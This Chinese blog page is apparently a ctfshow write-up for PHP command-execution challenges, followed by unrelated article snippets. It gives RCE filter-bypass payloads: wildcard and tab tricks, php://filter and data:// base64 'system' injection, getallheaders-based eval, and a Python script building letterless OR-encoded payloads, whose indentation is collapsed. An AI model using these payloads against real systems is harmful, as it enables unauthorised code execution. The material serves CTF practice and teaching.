当前位置：首页 > news >正文

ctfshow-命令执行

news 2026/5/13 7:40:26

大佬文章

$\rm Linux$ 下空格绕过

无参数 $\rm rce$

无字符 $\rm rce$

web29

通配符：

*：匹配任意多个字符

?：匹配任意一个字符

[]：匹配某个范围的字符（ $[a d]$ 表示 $a - d$ 的字符）

{a,b}：匹配 $a$ 或者 $b$

web30

echo `cat flag`：表示先运行 cat flag，然后再把结果输出

web31

%09(tab) 绕过空格
命令拼接：c=eval($_POST[a]);，然后 POST 传入一个变量 a 即可
无参数 $\rm rce$

web32

过滤分号，用 ?> 代替
过滤括号，使用 include 函数，其不需要括号传参（例如 include a.php）

因此 ?c=include%09$_POST[a]?> ，之后 post 传入一个文件即可

文件会被注释掉（显示不出来），所以考虑伪协议读文件

a=php://filter/read=convert.base64-encode/resource=flag.php

web37

使用 php://input 协议，之后 post 传入需要的 php 代码即可

web38

data 伪协议读文件

c=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZionKTs/Pg== ( $\rm base64$ 是 system("cat flag");)

web39

同web38

web40

无参数命令执行

getallheaders() 将 http 头中的信息放到一个数组里面

修改http 头中的某些不重要的内容为 system("cat flag")，使用语句 eval(array_rand(array_flip(getallheaders())));，多刷新几次即可做到无参数命令执行

web41

无数字字母 $\rm rce$

一般实现方法是自增，取反，异或，或

这题用的是或运算

# coding=gbk
import re
import requests
use = []
def get_and(aim, use):ans1 = ""ans2 = ""for i in range(len(aim)):ok = Falsefor j in range(len(use)):for k in range(j,len(use)):if (ord(use[j]) | ord(use[k])) == ord(aim[i]):ans1 = ans1 + use[j]ans2 = ans2 + use[k]ok = Trueif ok: breakif ok: break            ans = ""for i in range(len(ans1)): ans += chr(ord(ans1[i]) | ord(ans2[i]))    print(ans)return "(\""+ans1+"\"|\""+ans2+"\")"if __name__ == '__main__':match_str = "/[0-9]|[a-z]|\^|\+|\~|\$|\[|\]|\{|\}|\&|\-"url = "http://e5280b73-c2cb-4f3f-9309-68319256efdf.challenge.ctf.show/"for i in range(256):c = chr(i)tmp = re.match(match_str, c, re.I)if tmp == None:use.append(c)func = "system"argu = "cat flag.php"data = {"c":get_and(func,use)+get_and(argu,use)}print(data)r = requests.post(url = url, data = data)print(r.text)

web42

system($c." >/dev/null 2>&1"); 黑洞代码

cat flag && ls：只会让后面的查询没有
ls #：# 是 shell 脚本的注释

web46

flag 被过滤，可以换成 f''lag

未完待续

ctfshow-命令执行

大佬文章 L i n u x \rm Linux Linux 下空格绕过无参数 r c e \rm rce rce 无字符 r c e \rm rce rce web29 通配符： *：匹配任意多个字符 ?：匹配任意一个字符 []：匹配某个范围的字符（ [ a d ] [ad] [ad] 表示 …...

编程日记 2024/1/27 0:24:30

【Python基础015】集合的用法

1、定义集合是无序可变，元素不能重复。实际上，集合底层是字典实现，集合的所有元素都是字典中的 “ 键对象”，因此是不能重复的且唯一的。 2、创建 （1）使用{}创建 a {1, 2, 3} # 集合存储整数b {1, 2,…...

编程日记 2024/1/27 0:22:28

解密神经网络：深入探究传播机制与学习过程

解密神经网络：深入探究传播机制与学习过程文章目录解密神经网络：深入探究传播机制与学习过程一、引言二、基础理论1. 人工神经元：构建块的定义2. 神经网络的结构3. 激活函数的作用三、前向传播1. 数据流动：输入到输出2. 加权和…...

编程日记 2024/1/27 0:21:26

linux usb设备网络共享 usb/ip

USB设备的网络共享可以通过USB/IP来实现， USB/IP把USB I/O信息封装成TCP/IP格式在网络端传输 ，可以实现usb的全部功能，且跨平台，是个透明的设备共享机制。一、服务端 $sudo modprobe usbip-core$sudo modprobe usbip_host$usbip…...

编程日记 2024/1/27 0:20:25

如何通过系统命令排查账号安全？

如何通过系统命令排查账号安全 query user 查看当前登录账号 logoff id 注销用户id net user 查看用户 net user username 查看用户登录情况 lusrmgr.msc 查看隐藏账号 winR打开regedit注册表找到计算机\HEKY_LOCAL_MACHINE\SAM\SAM\右键给与用户读写权限刷新打开 HKEY…...

编程日记 2024/1/27 0:19:24

《WebKit 技术内幕》学习之九（3）： JavaScript引擎

3　JavaScriptCore引擎 3.1　原理 JavaScriptCore引擎是WebKit中的默认JavaScript引擎，也是苹果在开源WebKit项目之后，开源的另外一个重要的项目。同其他很多引擎一样，在刚开始的时候它的主要部分是一个基于抽象语法树的解释器，这…...

编程日记 2024/1/27 0:18:24

IS-IS：05 ISIS开销值和协议优先级

IS-IS 协议为路由器的每个 IS-IS 接口定义并维护了一个 level-1 开销值和一个 level-2开销值。开销值可以在接口上或者全局上手动配置，也可以使用 auto-cost自动计算确定。修改接口cost： int g0/0/0 isis cost 50修改全局cost： isis cir…...

编程日记 2024/1/27 0:17:23

群辉NAS的远程访问

群辉NAS是私有云存储，局域网访问很容易【详见：网上邻居访问设置、其它设备的访问设置】，远程访问相对复杂，涉及很多关键因素，现将过程记录如下： 目录 1、互联网接入 2、绑定MAC与IP地址 3、路由器开启5…...

编程日记 2024/1/27 0:15:21

构建未来学堂：在线教育系统开发技术实践

在当今数字化时代，在线教育系统的开发越发显得至关重要。本文将带你深入了解在线教育系统的开发，涉及到关键的技术实践和代码示例。我们将采用现代化技术栈，为未来学堂的搭建提供实用的指南。技术栈选择在开始实际的开发之前&#xff0c…...

编程日记 2024/1/27 0:14:20

EMQX 单机及集群搭建

目录 1. 通过 Yum 源安装（CentOS7 单机安装） 1.1. 通过以下命令配置 EMQX Yum 源： 1.2. 运行以下命令安装 EMQX： 1.3. 运行以下命令启动 EMQX： 1.4. 访问 http://192.168.88.130:18083，默认用户名: adm…...

编程日记 2024/1/27 0:13:19

SpringMVC-对静态资源的访问

1.工程中加入静态资源在webapp下创建static文件夹，此文件夹专门放入静态资源 2.使项目可以处理静态资源的请求在SpringMVC配置文件中添加以下语句 1.引入命名空间 xmlns:mvc"http://www.springframework.org/schema/mvc" xsi:schemaLocation“http…...

编程日记 2024/1/27 0:12:18

形参和实参

目录形参（形式参数）： 实参（实际参数）： 形参和实参的区别和联系具体实例: 当我们谈论"形参"和"实参"时，可以用以下类比来解释它们之间的关系： 形参…...

编程日记 2024/1/27 0:07:14

[git] windows系统安装git教程和配置

一、何为Git Git(读音为/gɪt/)是一个开源的分布式版本控制系统，可以有效、高速地处理从很小到非常大的项目版本管理。二、git安装包有2种版本，Git for Windows Setup和Git for Windows Portable(便携版)两个版本都可以。三、Git for Windows Por…...

编程日记 2024/1/27 0:05:13

php的性能要比node.js高很多吗？

在当今的编程世界中，PHP和Node.js是两种广泛使用的服务器端编程语言。虽然它们都用于构建高效的网络应用程序，但关于它们性能的争论一直存在。有些人认为PHP的性能要比Node.js高很多，而另一些人则持相反意见。性能通常指的是计算机程序或系…...

编程日记 2024/1/27 0:03:11

[极客大挑战 2019]BabySQL1

发现union select被过滤了，双写绕过 or、from被过滤 where被过滤在b4bysql中找到flag...

编程日记 2024/1/27 0:01:09

机器视觉在OCR字符检测的应用

在产品质量检测过程中，对于字符、条码等标识信息的识别、读取、检测是非常重要的一部分，比如在食品饮料包装检测中，生产日期、保质期、生产批号、条码等字符信息是产品管理和追溯必不可缺的，因此利用机器视觉技术进行OCR字符采…...

编程日记 2024/1/27 0:00:09

讲清楚浅拷贝和深拷贝

先放出实现浅拷贝和深拷贝的一些方法(直接食用)： 1.浅拷贝： 浅拷贝在拷贝对象的时候，对于对象最外一层实现的是普通的值拷贝，对于对象里面的对象是浅拷贝，只复制地址不复制地址对应的值。 /* 方法1.1：扩…...

编程日记 2024/1/26 23:55:58

[足式机器人]Part2 Dr. CAN学习笔记- 最优控制Optimal Control Ch07

本文仅供学习使用本文参考： B站：DR_CAN Dr. CAN学习笔记 - 最优控制Optimal Control Ch07-1最优控制问题与性能指标 1. 最优控制问题与性能指标2. 动态规划 Dynamic Programming2.1 基本概念2.2 代码详解2.3 简单一维案例 3. 线性二次型调节器&#xff…...

编程日记 2024/1/26 23:53:55

RedisInsight详细安装教程

简介 RedisInsight 是一个直观高效的 Redis GUI 管理工具，它可以对 Redis 的内存、连接数、命中率以及正常运行时间进行监控，并且可以在界面上使用 CLI 和连接的 Redis 进行交互（RedisInsight 内置对 Redis 模块支持）。 RedisIn…...

编程日记 2024/1/26 23:52:54

1. NosuchMethodError org.springframework.beans.factory.support.genericBeanDefinition(xxxxx) 2. ClassNotFoundException: org.springframework.boot.SpringApplication 可能冲突的依赖是： <dependency><groupId>org.springframework.boot</g…...

编程日记 2024/1/26 23:49:51

面试记录（2026/5/12）

问题一：java并发包下的AQS,了解多少？ 这个真是没看过源码，就不班门弄斧了直接学习下大佬的经验 https://blog.csdn.net/qq_45772447/article/details/149126295?fromshareblogdetail&sharetypeblogdetail&sharerId149126295&…...

编程新知 2026/5/13 7:02:58

IV测试仪选购避坑指南，这几点一定要提前了解

在光伏产业链中，IV测试仪应用广泛，覆盖组件分选、实验室检定、电站验收、运维排查等场景。市面上仪器品类繁杂，包含台式实验室款、生产线分选款、户外检测款，价格差距悬殊。不少采购人员不懂场景适配，盲目比价、堆砌参…...

编程新知 2026/5/13 6:58:47

ISSCC传感器设计启示：从高精度温度测量到低功耗系统优化

1. 从ISSCC看传感器设计的巅峰与启示每年二月的国际固态电路会议，对于像我这样泡在实验室和产线里的硬件工程师来说，就像一场技术界的“春晚”。它不发布概念，不空谈趋势，只展示过去一年里，全球顶尖研究团队在硅片上实…...

编程新知 2026/5/13 6:16:55

一键部署Obsidian环境：自动化脚本实现跨设备配置同步

1. 项目概述：为什么我们需要一个“一键式”的 Obsidian 安装脚本？如果你是一个深度依赖 Obsidian 进行知识管理、笔记写作或项目规划的从业者，无论是程序员、作家、学生还是研究员，大概率都经历过这样的场景：换了一台新…...

编程新知 2026/5/13 5:18:59

5分钟快速上手：XUnity.AutoTranslator游戏翻译插件完整教程

5分钟快速上手：XUnity.AutoTranslator游戏翻译插件完整教程【免费下载链接】XUnity.AutoTranslator 项目地址: https://gitcode.com/gh_mirrors/xu/XUnity.AutoTranslator 还在为外语游戏的语言障碍而烦恼吗？XUnity.AutoTranslator是一款强大的…...

编程新知 2026/5/13 5:16:48

Diem存储协议终极指南：如何构建高性能分布式文件存储系统

Diem存储协议终极指南：如何构建高性能分布式文件存储系统【免费下载链接】diem Diem’s mission is to build a trusted and innovative financial network that empowers people and businesses around the world. 项目地址: https://gitcode.com/gh_mirrors/di…...

编程新知 2026/5/13 4:57:34

开源项目metabase-mcp-server：用MCP协议连接Metabase与AI智能体，实现对话式数据分析

1. 项目概述：当开源BI工具遇上AI智能体如果你和我一样，在日常工作中既要用Metabase做数据可视化看板，又要和Claude、Cursor这类AI助手打交道，那你肯定也遇到过这样的痛点：想问问AI“上个月华东区的销售额趋势”&#x…...

编程新知 2026/5/13 4:32:58

北京数据恢复公司哪个公司好

在当今数字化时代，数据的重要性不言而喻。无论是个人用户的珍贵照片、文档，还是企业的重要商业数据，一旦丢失，都可能造成巨大的损失。在北京，有众多的数据恢复公司，那么哪家公司才是最好的选择呢&#xff1…...

编程新知 2026/5/13 3:05:35

iOS设备支持文件管理解决方案：如何解决Xcode开发环境兼容性问题

iOS设备支持文件管理解决方案：如何解决Xcode开发环境兼容性问题【免费下载链接】iOSDeviceSupport All versions of iOS Device Support 项目地址: https://gitcode.com/gh_mirrors/ios/iOSDeviceSupport iOSDeviceSupport项目为iOS开发者提供了全面的设备支…...

编程新知 2026/5/13 1:50:29

大模型高效化实战：从量化剪枝到推理部署的完整指南

1. 大模型高效化：从“巨无霸”到“精悍战士”的必经之路如果你和我一样，在过去的几年里深度参与过大语言模型的部署和应用，那你一定对“模型太大”这个问题深有体会。动辄几十GB甚至上百GB的模型文件，对显存的贪婪吞噬&#xff0c…...

编程新知 2026/5/13 1:37:03